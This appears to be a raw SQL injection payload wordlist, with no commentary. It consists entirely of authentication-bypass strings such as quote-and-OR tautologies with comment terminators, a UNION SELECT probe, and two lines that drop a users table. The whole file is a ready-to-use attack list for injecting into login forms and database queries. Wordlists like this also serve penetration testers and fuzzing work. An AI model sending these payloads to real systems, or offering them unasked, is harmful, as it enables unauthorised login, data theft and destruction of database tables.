' OR 1=1 --
' OR 'a'='a' --
1' OR '1'='1' --
admin' OR '1'='1' --
') OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' ;--
"; DROP TABLE users --
'; DROP TABLE users --
 UNION SELECT null, null, null --
 OR '1'='1
 OR '1'='1'--
 OR "1"="1"
 OR "1"="1"--
 OR 1=1
 OR 1=1--
 OR a=a
 OR a=a--
' OR 'a'='a
' OR 'a'='a'--
' OR ""='
' OR ""='--
") OR ("a"="a
") OR ("a"="a"--
")) OR (("a"="a
")) OR (("a"="a"--
' OR 'x'='x
' OR 'x'='x'--
' OR 1=1/*
' OR 1=1/*
') OR ('x'='x
') OR ('x'='x'--
' OR 1=1 or ''='
' OR 1=1 or ""='
' OR 1=1 or ""=""--
' OR 1=1 or ''=''--
') OR ('x'='x
') OR ('x'='x'--
') OR 'a'='a
') OR 'a'='a'--
') OR ('a'='a
') OR ('a'='a'--
")) OR (("a"="a
")) OR (("a"="a"-- 
")) OR (("a"="a
")) OR (("a"="a"-- 
')) OR (('a'='a
')) OR (('a'='a'--
')) OR (('a'='a
')) OR (('a'='a'--
OR 1=1;--
OR 'a'='a
OR "a"="a"
OR 1=1
OR a=a
OR 'a'='a
OR ""='
OR ""=""
OR ("a"="a
OR ("a"="a"--
OR (("a"="a
OR (("a"="a"-- 
OR 'x'='x
OR 'x'='x'
OR 1=1/*
OR 1=1/*
OR 'x'='x
OR 'x'='x'
OR 1=1 or ''='
OR 1=1 or ""=""
OR 1=1 or ""=""
OR 1=1 or ''=''
') OR ('a'='a
') OR ('a'='a'
') OR ('a'='a
') OR ('a'='a'
")) OR (("a"="a
")) OR (("a"="a'--
")) OR (("a"="a
")) OR (("a"="a'--
')) OR (('a'='a
')) OR (('a'='a'--
')) OR (('a'='a
')) OR (('a'='a'--
') OR ('x'='x
') OR ('x'='x'--
') OR ('x'='x
') OR ('x'='x'--
') OR 'a'='a
') OR 'a'='a'--
") OR ("a"="a
") OR ("a"="a'--
")) OR (("a"="a
")) OR (("a"="a'--
')) OR (('a'='a
')) OR (('a'='a'--
